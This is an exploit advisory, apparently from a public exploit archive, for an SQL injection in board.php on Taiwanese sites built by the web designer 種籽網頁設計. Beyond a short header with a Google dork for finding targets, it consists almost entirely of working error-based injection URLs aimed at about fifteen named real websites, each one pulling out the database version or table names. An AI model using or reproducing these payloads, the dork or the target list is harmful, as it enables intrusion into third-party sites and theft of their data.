Design By 種籽網頁設計 SQL injection

2015.12.28
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : Design By 種籽網頁設計 SQL injection # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.e-seed.com.tw/ # Google Dork : site:.tw inurl:board.php? stx= # Date: 26 Dec 2015 # Tested On : Win 10 / Google Chrome # ###################### # adminpage= target/adm/ # # demos : # http://www.chain-dent.com.tw/bbs/board.php?bo_table=dental&page=1&sfl=1'&sod=desc&sop=and&sst=40(SELECT 1 from(SELECT COUNT(*),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(table_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+- # http://sun-wang.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- # http://www.e-topway.com.tw/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- # 
http://hsu-design.com/bbs/board.php?bo_table=link&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- # http://pentathlon.org.tw/bbs/board.php?bo_table=links&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- # http://www.shootingsport.org.tw/bbs/board.php?bo_table=link&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- # http://www.in-motel.com.tw/bbs/board.php?bo_table=room&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- # 
http://www.flower888.com.tw/bbs/board.php?bo_table=special&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- # http://www.tw-sd.com/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- # http://www.su-attorneys.com.tw/bbs/board.php?bo_table=legal&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- # http://www.e-topway.com.tw/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- # 
http://www.wtd.com.tw/bbs/board.php?bo_table=building&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- # http://home-light.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- # http://www.cscsignal.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+- ###################### # discovered by : modiret ######################

